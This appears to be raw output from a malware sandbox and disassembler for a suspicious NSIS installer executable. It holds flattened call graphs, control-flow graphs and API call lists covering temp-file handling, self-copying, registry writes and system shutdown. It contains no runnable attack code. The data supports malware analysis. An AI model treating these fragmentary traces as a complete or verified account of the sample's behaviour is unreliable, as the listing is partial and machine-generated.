5519 1000152e 4 API calls 5518->5519 5520 10001092 5518->5520 5519->5520 5521 1000152e 4 API calls 5520->5521 5522 100010a2 5521->5522 5523 100010b2 5522->5523 5524 100010a9 GlobalSize 5522->5524 5525 100010b6 GlobalAlloc 5523->5525 5526 100010c7 5523->5526 5524->5523 5527 10001555 3 API calls 5525->5527 5528 100010d2 GlobalFree 5526->5528 5527->5526 5528->5517 5529 40159b 5530 402b38 18 API calls 5529->5530 5531 4015a2 SetFileAttributesW 5530->5531 5532 4015b4 5531->5532 4911 40219e 4912 402b38 18 API calls 4911->4912 4913 4021a4 4912->4913 4914 402b38 18 API calls 4913->4914 4915 4021ad 4914->4915 4916 402b38 18 API calls 4915->4916 4917 4021b6 4916->4917 4918 40622b 2 API calls 4917->4918 4919 4021bf 4918->4919 4920 4021d0 lstrlenW lstrlenW 4919->4920 4921 4021c3 4919->4921 4923 405192 25 API calls 4920->4923 4922 405192 25 API calls 4921->4922 4925 4021cb 4921->4925 4922->4925 4924 40220e SHFileOperationW 4923->4924 4924->4921 4924->4925 5533 40149e 5534 40223c 5533->5534 5535 4014ac PostQuitMessage 5533->5535 5535->5534 5536 4029a0 SendMessageW 5537 4029c5 5536->5537 5538 4029ba InvalidateRect 5536->5538 5538->5537 5546 100010e1 5547 10001111 5546->5547 5548 10001243 3 API calls 5547->5548 5558 10001121 5548->5558 5549 100011d8 GlobalFree 5550 100012c8 2 API calls 5550->5558 5551 100011d3 5551->5549 5552 10001243 3 API calls 5552->5558 5553 10001164 GlobalAlloc 5553->5558 5554 100011f8 GlobalFree 5554->5558 5555 10001280 2 API calls 5557 100011c4 GlobalFree 5555->5557 5556 100012f3 lstrcpyW 5556->5558 5557->5558 5558->5549 5558->5550 5558->5551 5558->5552 5558->5553 5558->5554 5558->5555 5558->5556 5558->5557 3905 401b22 3906 401b73 3905->3906 3907 401b2f 3905->3907 3909 401b78 3906->3909 3910 401b9d GlobalAlloc 3906->3910 3908 401bb8 3907->3908 3913 401b46 3907->3913 3911 405f0a 18 API calls 3908->3911 3918 40223c 3908->3918 3909->3918 3944 405ee8 lstrcpynW 3909->3944 3924 405f0a 3910->3924 3914 402236 3911->3914 3942 405ee8 lstrcpynW 3913->3942 3945 4056c4 3914->3945 3917 401b8a GlobalFree 3917->3918 3919 401b55 3943 405ee8 lstrcpynW 3919->3943 3922 401b64 3949 405ee8 lstrcpynW 3922->3949 3926 405f17 3924->3926 3925 406162 3927 406178 3925->3927 3966 405ee8 lstrcpynW 3925->3966 3926->3925 3929 405fca GetVersion 3926->3929 3930 406130 lstrlenW 3926->3930 3933 405f0a 10 API calls 3926->3933 3935 406045 GetSystemDirectoryW 3926->3935 3936 406058 GetWindowsDirectoryW 3926->3936 3938 40608c SHGetSpecialFolderLocation 3926->3938 3939 405f0a 10 API calls 3926->3939 3940 4060d1 lstrcatW 3926->3940 3950 405db5 RegOpenKeyExW 3926->3950 3955 40617c 3926->3955 3964 405e2f wsprintfW 3926->3964 3965 405ee8 lstrcpynW 3926->3965 3927->3908 3929->3926 3930->3926 3933->3930 3935->3926 3936->3926 3938->3926 3941 4060a4 SHGetPathFromIDListW CoTaskMemFree 3938->3941 3939->3926 3940->3926 3941->3926 3942->3919 3943->3922 3944->3917 3946 4056d9 3945->3946 3947 405725 3946->3947 3948 4056ed MessageBoxIndirectW 3946->3948 3947->3918 3948->3947 3949->3918 3951 405e29 3950->3951 3952 405de9 RegQueryValueExW 3950->3952 3951->3926 3953 405e0a RegCloseKey 3952->3953 3953->3951 3962 406189 3955->3962 3956 4061ff 3957 406204 CharPrevW 3956->3957 3959 406225 3956->3959 3957->3956 3958 4061f2 CharNextW 3958->3956 3958->3962 3959->3926 3961 4061de CharNextW 3961->3962 3962->3956 3962->3958 3962->3961 3963 4061ed CharNextW 3962->3963 3967 405960 3962->3967 3963->3958 3964->3926 3965->3926 3966->3927 3968 405966 3967->3968 3969 40597c 3968->3969 3970 40596d CharNextW 3968->3970 3969->3962 3970->3968 5559 402222 5560 402229 5559->5560 5563 40223c 5559->5563 5561 405f0a 18 API calls 5560->5561 5562 402236 5561->5562 5564 4056c4 MessageBoxIndirectW 5562->5564 5564->5563 3971 401924 3972 401926 3971->3972 3977 402b38 3972->3977 3978 402b44 3977->3978 3979 405f0a 18 API calls 3978->3979 3980 402b65 3979->3980 3981 40192b 3980->3981 3982 40617c 5 API calls 3980->3982 3983 405770 3981->3983 3982->3981 4022 405a3b 3983->4022 3986 405798 DeleteFileW 3988 401934 3986->3988 3987 4057af 3989 4058da 3987->3989 4036 405ee8 lstrcpynW 3987->4036 3989->3988 4066 40622b FindFirstFileW 3989->4066 3991 4057d5 3992 4057e8 3991->3992 3993 4057db lstrcatW 3991->3993 4037 40597f lstrlenW 3992->4037 3995 4057ee 3993->3995 3998 4057fe lstrcatW 3995->3998 3999 405809 lstrlenW FindFirstFileW 3995->3999 3998->3999 4003 4058cf 3999->4003 4020 40582b 3999->4020 4000 4058f8 4069 405933 lstrlenW CharPrevW 4000->4069 4003->3989 4004 4058b2 FindNextFileW 4008 4058c8 FindClose 4004->4008 4004->4020 4005 405728 5 API calls 4007 40590a 4005->4007 4009 405924 4007->4009 4010 40590e 4007->4010 4008->4003 4012 405192 25 API calls 4009->4012 4010->3988 4013 405192 25 API calls 4010->4013 4012->3988 4015 40591b 4013->4015 4014 405770 64 API calls 4014->4020 4017 405d82 40 API calls 4015->4017 4016 405192 25 API calls 4016->4004 4019 405922 4017->4019 4019->3988 4020->4004 4020->4014 4020->4016 4041 405ee8 lstrcpynW 4020->4041 4042 405728 4020->4042 4050 405192 4020->4050 4061 405d82 4020->4061 4072 405ee8 lstrcpynW 4022->4072 4024 405a4c 4073 4059de CharNextW CharNextW 4024->4073 4027 405790 4027->3986 4027->3987 4028 40617c 5 API calls 4034 405a62 4028->4034 4029 405a93 lstrlenW 4030 405a9e 4029->4030 4029->4034 4032 405933 3 API calls 4030->4032 4031 40622b 2 API calls 4031->4034 4033 405aa3 GetFileAttributesW 4032->4033 4033->4027 4034->4027 4034->4029 4034->4031 4035 40597f 2 API calls 4034->4035 4035->4029 4036->3991 4038 40598d 4037->4038 4039 405993 CharPrevW 4038->4039 4040 40599f 4038->4040 4039->4038 4039->4040 4040->3995 4041->4020 4079 405b2f GetFileAttributesW 4042->4079 4044 405755 4044->4020 4046 405743 RemoveDirectoryW 4048 405751 4046->4048 4047 40574b DeleteFileW 4047->4048 4048->4044 4049 405761 SetFileAttributesW 4048->4049 4049->4044 4051 4051ad 4050->4051 4052 40524f 4050->4052 4053 4051c9 lstrlenW 4051->4053 4054 405f0a 18 API calls 4051->4054 4052->4020 4055 4051f2 4053->4055 4056 4051d7 lstrlenW 4053->4056 4054->4053 4058 405205 4055->4058 4059 4051f8 SetWindowTextW 4055->4059 4056->4052 4057 4051e9 lstrcatW 4056->4057 4057->4055 4058->4052 4060 40520b SendMessageW SendMessageW SendMessageW 4058->4060 4059->4058 4060->4052 4082 406252 GetModuleHandleA 4061->4082 4065 405daa 4065->4020 4067 406241 FindClose 4066->4067 4068 4058f4 4066->4068 4067->4068 4068->3988 4068->4000 4070 4058fe 4069->4070 4071 40594f lstrcatW 4069->4071 4070->4005 4071->4070 4072->4024 4074 4059fb 4073->4074 4077 405a0d 4073->4077 4076 405a08 CharNextW 4074->4076 4074->4077 4075 405a31 4075->4027 4075->4028 4076->4075 4077->4075 4078 405960 CharNextW 4077->4078 4078->4077 4080 405b41 SetFileAttributesW 4079->4080 4081 405734 4079->4081 4080->4081 4081->4044 4081->4046 4081->4047 4083 406279 GetProcAddress 4082->4083 4084 40626e LoadLibraryA 4082->4084 4085 405d89 4083->4085 4084->4083 4084->4085 4085->4065 4086 405c06 lstrcpyW 4085->4086 4087 405c55 GetShortPathNameW 4086->4087 4088 405c2f 4086->4088 4089 405c6a 4087->4089 4090 405d7c 4087->4090 4111 405b54 GetFileAttributesW CreateFileW 4088->4111 4089->4090 4092 405c72 wsprintfA 4089->4092 4090->4065 4094 405f0a 18 API calls 4092->4094 4093 405c39 CloseHandle GetShortPathNameW 4093->4090 4095 405c4d 4093->4095 4096 405c9a 4094->4096 4095->4087 4095->4090 4112 405b54 GetFileAttributesW CreateFileW 4096->4112 4098 405ca7 4098->4090 4099 405cb6 GetFileSize GlobalAlloc 4098->4099 4100 405d75 CloseHandle 4099->4100 4101 405cd8 4099->4101 4100->4090 4113 405bd7 ReadFile 4101->4113 4106 405cf7 lstrcpyA 4109 405d19 4106->4109 4107 405d0b 4108 405ab9 4 API calls 4107->4108 4108->4109 4110 405d50 SetFilePointer WriteFile GlobalFree 4109->4110 4110->4100 4111->4093 4112->4098 4114 405bf5 4113->4114 4114->4100 4115 405ab9 lstrlenA 4114->4115 4116 405afa lstrlenA 4115->4116 4117 405b02 4116->4117 4118 405ad3 lstrcmpiA 4116->4118 4117->4106 4117->4107 4118->4117 4119 405af1 CharNextA 4118->4119 4119->4116 5565 10001667 5566 1000152e 4 API calls 5565->5566 5569 1000167f 5566->5569 5567 100016c5 GlobalFree 5568 1000169a 5568->5567 5569->5567 5569->5568 5570 100016b1 VirtualFree 5569->5570 5570->5567 5571 402727 5572 4029c5 5571->5572 5573 40272e 5571->5573 5574 402734 FindClose 5573->5574 5574->5572 5575 401cab 5576 402b1b 18 API calls 5575->5576 5577 401cb2 5576->5577 5578 402b1b 18 API calls 5577->5578 5579 401cba GetDlgItem 5578->5579 5580 4024e6 5579->5580 4131 40232f 4132 402335 4131->4132 4133 402b38 18 API calls 4132->4133 4134 402347 4133->4134 4135 402b38 18 API calls 4134->4135 4136 402351 RegCreateKeyExW 4135->4136 4137 40237b 4136->4137 4139 402791 4136->4139 4138 402396 4137->4138 4140 402b38 18 API calls 4137->4140 4141 402b1b 18 API calls 4138->4141 4144 4023a2 4138->4144 4143 40238c lstrlenW 4140->4143 4141->4144 4142 4023bd RegSetValueExW 4146 4023d3 RegCloseKey 4142->4146 4143->4138 4144->4142 4148 403060 4144->4148 4146->4139 4149 403070 SetFilePointer 4148->4149 4150 40308c 4148->4150 4149->4150 4163 40317b GetTickCount 4150->4163 4153 405bd7 ReadFile 4154 4030ac 4153->4154 4155 40317b 43 API calls 4154->4155 4159 403137 4154->4159 4156 4030c3 4155->4156 4157 40313d ReadFile 4156->4157 4156->4159 4160 4030d3 4156->4160 4157->4159 4159->4142 4160->4159 4161 405bd7 ReadFile 4160->4161 4162 403106 WriteFile 4160->4162 4161->4160 4162->4159 4162->4160 4164 4032e5 4163->4164 4165 4031aa 4163->4165 4166 402d18 33 API calls 4164->4166 4176 40330d SetFilePointer 4165->4176 4172 403093 4166->4172 4168 4031b5 SetFilePointer 4173 4031da 4168->4173 4172->4153 4172->4159 4173->4172 4174 40326f WriteFile 4173->4174 4175 4032c6 SetFilePointer 4173->4175 4177 4032f7 4173->4177 4180 40638e 4173->4180 4187 402d18 4173->4187 4174->4172 4174->4173 4175->4164 4176->4168 4178 405bd7 ReadFile 4177->4178 4179 40330a 4178->4179 4179->4173 4181 4063b3 4180->4181 4182 4063bb 4180->4182 4181->4173 4182->4181 4183 406442 GlobalFree 4182->4183 4184 40644b GlobalAlloc 4182->4184 4185 4064c2 GlobalAlloc 4182->4185 4186 4064b9 GlobalFree 4182->4186 4183->4184 4184->4181 4184->4182 4185->4181 4185->4182 4186->4185 4188 402d41 4187->4188 4189 402d29 4187->4189 4191 402d51 GetTickCount 4188->4191 4192 402d49 4188->4192 4190 402d32 DestroyWindow 4189->4190 4194 402d39 4189->4194 4190->4194 4191->4194 4195 402d5f 4191->4195 4202 40628b 4192->4202 4194->4173 4196 402d94 CreateDialogParamW ShowWindow 4195->4196 4197 402d67 4195->4197 4196->4194 4197->4194 4206 402cfc 4197->4206 4199 402d75 wsprintfW 4200 405192 25 API calls 4199->4200 4201 402d92 4200->4201 4201->4194 4203 4062a8 PeekMessageW 4202->4203 4204 4062b8 4203->4204 4205 40629e DispatchMessageW 4203->4205 4204->4194 4205->4203 4207 402d0b 4206->4207 4208 402d0d MulDiv 4206->4208 4207->4208 4208->4199 5581 4016af 5582 402b38 18 API calls 5581->5582 5583 4016b5 GetFullPathNameW 5582->5583 5584 4016f1 5583->5584 5585 4016cf 5583->5585 5586 4029c5 5584->5586 5587 401706 GetShortPathNameW 5584->5587 5585->5584 5588 40622b 2 API calls 5585->5588 5587->5586 5589 4016e1 5588->5589 5589->5584 5591 405ee8 lstrcpynW 5589->5591 5591->5584 5599 4027b3 5600 402b38 18 API calls 5599->5600 5601 4027c1 5600->5601 5602 4027d7 5601->5602 5603 402b38 18 API calls 5601->5603 5604 405b2f 2 API calls 5602->5604 5603->5602 5605 4027dd 5604->5605 5625 405b54 GetFileAttributesW CreateFileW 5605->5625 5607 4027ea 5608 402893 5607->5608 5609 4027f6 GlobalAlloc 5607->5609 5612 40289b DeleteFileW 5608->5612 5613 4028ae 5608->5613 5610 40288a CloseHandle 5609->5610 5611 40280f 5609->5611 5610->5608 5626 40330d SetFilePointer 5611->5626 5612->5613 5615 402815 5616 4032f7 ReadFile 5615->5616 5617 40281e GlobalAlloc 5616->5617 5618 402862 WriteFile GlobalFree 5617->5618 5619 40282e 5617->5619 5620 403060 46 API calls 5618->5620 5621 403060 46 API calls 5619->5621 5622 402887 5620->5622 5624 40283b 5621->5624 5622->5610 5623 402859 GlobalFree 5623->5618 5624->5623 5625->5607 5626->5615 5627 4028b4 5628 402b1b 18 API calls 5627->5628 5629 4028ba 5628->5629 5630 4028f6 5629->5630 5631 4028dd 5629->5631 5637 402791 5629->5637 5634 402900 5630->5634 5635 40290c 5630->5635 5632 4028e2 5631->5632 5633 4028f3 5631->5633 5641 405ee8 lstrcpynW 5632->5641 5633->5637 5642 405e2f wsprintfW 5633->5642 5638 402b1b 18 API calls 5634->5638 5636 405f0a 18 API calls 5635->5636 5636->5633 5638->5633 5641->5637 5642->5637 5643 4014b8 5644 4014be 5643->5644 5645 401389 2 API calls 5644->5645 5646 4014c6 5645->5646 4876 4015b9 4877 402b38 18 API calls 4876->4877 4878 4015c0 4877->4878 4879 4059de 4 API calls 4878->4879 4890 4015c9 4879->4890 4880 401614 4882 401646 4880->4882 4883 401619 4880->4883 4881 405960 CharNextW 4884 4015d7 CreateDirectoryW 4881->4884 4887 401423 25 API calls 4882->4887 4885 401423 25 API calls 4883->4885 4886 4015ed GetLastError 4884->4886 4884->4890 4888 401620 4885->4888 4886->4890 4891 4015fa GetFileAttributesW 4886->4891 4893 40163e 4887->4893 4894 405ee8 lstrcpynW 4888->4894 4890->4880 4890->4881 4891->4890 4892 40162d SetCurrentDirectoryW 4892->4893 4894->4892 5647 401939 5648 402b38 18 API calls 5647->5648 5649 401940 lstrlenW 5648->5649 5650 4024e6 5649->5650 5651 402939 5652 402b1b 18 API calls 5651->5652 5653 40293f 5652->5653 5654 402972 5653->5654 5656 40294d 5653->5656 5657 402791 5653->5657 5655 405f0a 18 API calls 5654->5655 5654->5657 5655->5657 5656->5657 5659 405e2f wsprintfW 5656->5659 5659->5657 5660 40653d 5666 4063c1 5660->5666 5661 406d2c 5662 406442 GlobalFree 5663 40644b GlobalAlloc 5662->5663 5663->5661 5663->5666 5664 4064c2 GlobalAlloc 5664->5661 5664->5666 5665 4064b9 GlobalFree 5665->5664 5666->5661 5666->5662 5666->5663 5666->5664 5666->5665 4926 40173f 4927 402b38 18 API calls 4926->4927 4928 401746 4927->4928 4929 405b83 2 API calls 4928->4929 4930 40174d 4929->4930 4931 405b83 2 API calls 4930->4931 4931->4930

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 403358-4033ee #17 SetErrorMode OleInitialize call 406252 SHGetFileInfoW call 405ee8 GetCommandLineW call 405ee8 GetModuleHandleW 7 4033f0-4033f7 0->7 8 4033f8-40340a call 405960 CharNextW 0->8 7->8 11 4034d8-4034de 8->11 12 4034e4 11->12 13 40340f-403415 11->13 14 4034f8-403512 GetTempPathW call 403324 12->14 15 403417-40341c 13->15 16 40341e-403424 13->16 25 403514-403532 GetWindowsDirectoryW lstrcatW call 403324 14->25 26 40356a-403584 DeleteFileW call 402dba 14->26 15->15 15->16 18 403426-40342a 16->18 19 40342b-40342f 16->19 18->19 21 403435-40343b 19->21 22 4034c9-4034d4 call 405960 19->22 23 403455-40346c 21->23 24 40343d-403444 21->24 22->11 39 4034d6-4034d7 22->39 30 40349a-4034b0 23->30 31 40346e-403484 23->31 28 403446-403449 24->28 29 40344b 24->29 25->26 42 403534-403564 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403324 25->42 44 40361a-403629 call 4037c0 OleUninitialize 26->44 45 40358a-403590 26->45 28->23 28->29 29->23 30->22 37 4034b2-4034c7 30->37 31->30 35 403486-40348e 31->35 40 403490-403493 35->40 41 403495 35->41 37->22 43 4034e6-4034f3 call 405ee8 37->43 39->11 40->30 40->41 41->30 42->26 42->44 43->14 57 403725-40372b 44->57 58 40362f-40363f call 4056c4 ExitProcess 44->58 49 403592-40359d call 405960 45->49 50 40360a-403611 call 4038b2 45->50 61 4035d4-4035de 49->61 62 40359f-4035b0 49->62 56 403616 50->56 56->44 59 4037a8-4037b0 57->59 60 40372d-40374a call 406252 * 3 57->60 66 4037b2 59->66 67 4037b6-4037ba ExitProcess 59->67 91 403794-40379f ExitWindowsEx 60->91 92 40374c-40374e 60->92 68 4035e0-4035ee call 405a3b 61->68 69 403645-40365f lstrcatW lstrcmpiW 61->69 65 4035b2-4035b4 62->65 72 4035b6-4035cc 65->72 73 4035ce-4035d2 65->73 66->67 68->44 81 4035f0-403606 call 405ee8 * 2 68->81 69->44 75 403661-403677 CreateDirectoryW SetCurrentDirectoryW 69->75 72->61 72->73 73->61 73->65 78 403684-4036ad call 405ee8 75->78 79 403679-40367f call 405ee8 75->79 89 4036b2-4036ce call 405f0a DeleteFileW 78->89 79->78 81->50 98 4036d0-4036e0 CopyFileW 89->98 99 40370f-403717 89->99 91->59 95 4037a1-4037a3 call 40140b 91->95 92->91 96 403750-403752 92->96 95->59 96->91 101 403754-403766 GetCurrentProcess 96->101 98->99 102 4036e2-403702 call 405d82 call 405f0a call 405663 98->102 99->89 103 403719-403720 call 405d82 99->103 101->91 108 403768-40378a 101->108 102->99 115 403704-40370b CloseHandle 102->115 103->44 108->91 115->99
                                                  APIs
                                                  • #17.COMCTL32 ref: 00403377
                                                  • SetErrorMode.KERNELBASE(00008001), ref: 00403382
                                                  • OleInitialize.OLE32(00000000), ref: 00403389
                                                    • Part of subcall function 00406252: GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
                                                    • Part of subcall function 00406252: LoadLibraryA.KERNELBASE(?,?,00000020,0040339B,00000008), ref: 0040626F
                                                    • Part of subcall function 00406252: GetProcAddress.KERNEL32(00000000,?), ref: 00406280
                                                  • SHGetFileInfoW.SHELL32(00420690,00000000,?,000002B4,00000000), ref: 004033B1
                                                    • Part of subcall function 00405EE8: lstrcpynW.KERNEL32(?,?,00000400,004033C6,004281E0,NSIS Error), ref: 00405EF5
                                                  • GetCommandLineW.KERNEL32(004281E0,NSIS Error), ref: 004033C6
                                                  • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\u9aPQQIwhj.exe",00000000), ref: 004033D9
                                                  • CharNextW.USER32(00000000,"C:\Users\user\Desktop\u9aPQQIwhj.exe",00000020), ref: 00403400
                                                  • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403509
                                                  • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040351A
                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403526
                                                  • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040353A
                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403542
                                                  • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403553
                                                  • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040355B
                                                  • DeleteFileW.KERNELBASE(1033), ref: 0040356F
                                                  • OleUninitialize.OLE32(?), ref: 0040361F
                                                  • ExitProcess.KERNEL32 ref: 0040363F
                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\u9aPQQIwhj.exe",00000000,?), ref: 0040364B
                                                  • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\u9aPQQIwhj.exe",00000000,?), ref: 00403657
                                                  • CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403663
                                                  • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 0040366A
                                                  • DeleteFileW.KERNEL32(0041FE90,0041FE90,?,0042A000,?), ref: 004036C4
                                                  • CopyFileW.KERNEL32(C:\Users\user\Desktop\u9aPQQIwhj.exe,0041FE90,?), ref: 004036D8
                                                  • CloseHandle.KERNEL32(00000000,0041FE90,0041FE90,?,0041FE90,00000000), ref: 00403705
                                                  • GetCurrentProcess.KERNEL32(00000028,00000004,00000005,00000004,00000003), ref: 0040375B
                                                  • ExitWindowsEx.USER32(00000002,00000000), ref: 00403797
                                                  • ExitProcess.KERNEL32 ref: 004037BA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                  • String ID: "C:\Users\user\Desktop\u9aPQQIwhj.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\u9aPQQIwhj.exe$C:\Users\user\Uploadable\normallnnens$C:\Users\user\Uploadable\normallnnens\Trskelen$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                  • API String ID: 4107622049-648187735
                                                  • Opcode ID: a3fc4b19b007463ca7c8d179c052c8cc71bf452235c419b64912ac856f47fe19
                                                  • Instruction ID: d10961c3cf085e12fbe59355e5df5276e8fc63a686dc482ac58f4e9f7edec25e
                                                  • Opcode Fuzzy Hash: a3fc4b19b007463ca7c8d179c052c8cc71bf452235c419b64912ac856f47fe19
                                                  • Instruction Fuzzy Hash: 8CB1E070904211AAD720BF629D49A3B3EACEB45706F40453FF542B62E2D77C5A41CB7E

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 116 4052d1-4052ec 117 4052f2-4053bb GetDlgItem * 3 call 404162 call 404a2f GetClientRect GetSystemMetrics SendMessageW * 2 116->117 118 40547d-405484 116->118 141 4053d9-4053dc 117->141 142 4053bd-4053d7 SendMessageW * 2 117->142 120 405486-4054a8 GetDlgItem CreateThread CloseHandle 118->120 121 4054ae-4054bb 118->121 120->121 123 4054d9-4054e3 121->123 124 4054bd-4054c3 121->124 127 4054e5-4054eb 123->127 128 405539-40553d 123->128 125 4054c5-4054d4 ShowWindow * 2 call 404162 124->125 126 4054fe-405507 call 404194 124->126 125->123 138 40550c-405510 126->138 131 405513-405523 ShowWindow 127->131 132 4054ed-4054f9 call 404106 127->132 128->126 135 40553f-405545 128->135 139 405533-405534 call 404106 131->139 140 405525-40552e call 405192 131->140 132->126 135->126 136 405547-40555a SendMessageW 135->136 143 405560-40558b CreatePopupMenu call 405f0a AppendMenuW 136->143 144 40565c-40565e 136->144 139->128 140->139 145 4053ec-405403 call 40412d 141->145 146 4053de-4053ea SendMessageW 141->146 142->141 153 4055a0-4055b5 TrackPopupMenu 143->153 154 40558d-40559d GetWindowRect 143->154 144->138 155 405405-405419 ShowWindow 145->155 156 405439-40545a GetDlgItem SendMessageW 145->156 146->145 153->144 157 4055bb-4055d2 153->157 154->153 158 405428 155->158 159 40541b-405426 ShowWindow 155->159 156->144 160 405460-405478 SendMessageW * 2 156->160 161 4055d7-4055f2 SendMessageW 157->161 162 40542e-405434 call 404162 158->162 159->162 160->144 161->161 163 4055f4-405617 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 161->163 162->156 165 405619-405640 SendMessageW 163->165 165->165 166 405642-405656 GlobalUnlock SetClipboardData CloseClipboard 165->166 166->144
                                                  APIs
                                                  • GetDlgItem.USER32(?,00000403), ref: 00405330
                                                  • GetDlgItem.USER32(?,000003EE), ref: 0040533F
                                                  • GetClientRect.USER32(?,?), ref: 0040537C
                                                  • GetSystemMetrics.USER32(00000015), ref: 00405384
                                                  • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004053A5
                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053B6
                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053C9
                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053D7
                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 004053EA
                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040540C
                                                  • ShowWindow.USER32(?,00000008), ref: 00405420
                                                  • GetDlgItem.USER32(?,000003EC), ref: 00405441
                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405451
                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040546A
                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405476
                                                  • GetDlgItem.USER32(?,000003F8), ref: 0040534E
                                                    • Part of subcall function 00404162: SendMessageW.USER32(00000028,?,?,00403F8E), ref: 00404170
                                                  • GetDlgItem.USER32(?,000003EC), ref: 00405493
                                                  • CreateThread.KERNELBASE(00000000,00000000,Function_00005265,00000000), ref: 004054A1
                                                  • CloseHandle.KERNELBASE(00000000), ref: 004054A8
                                                  • ShowWindow.USER32(00000000), ref: 004054CC
                                                  • ShowWindow.USER32(?,00000008), ref: 004054D1
                                                  • ShowWindow.USER32(00000008), ref: 0040551B
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040554F
                                                  • CreatePopupMenu.USER32 ref: 00405560
                                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405574
                                                  • GetWindowRect.USER32(?,?), ref: 00405594
                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055AD
                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 004055E5
                                                  • OpenClipboard.USER32(00000000), ref: 004055F5
                                                  • EmptyClipboard.USER32 ref: 004055FB
                                                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405607
                                                  • GlobalLock.KERNEL32(00000000), ref: 00405611
                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405625
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00405645
                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00405650
                                                  • CloseClipboard.USER32 ref: 00405656
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
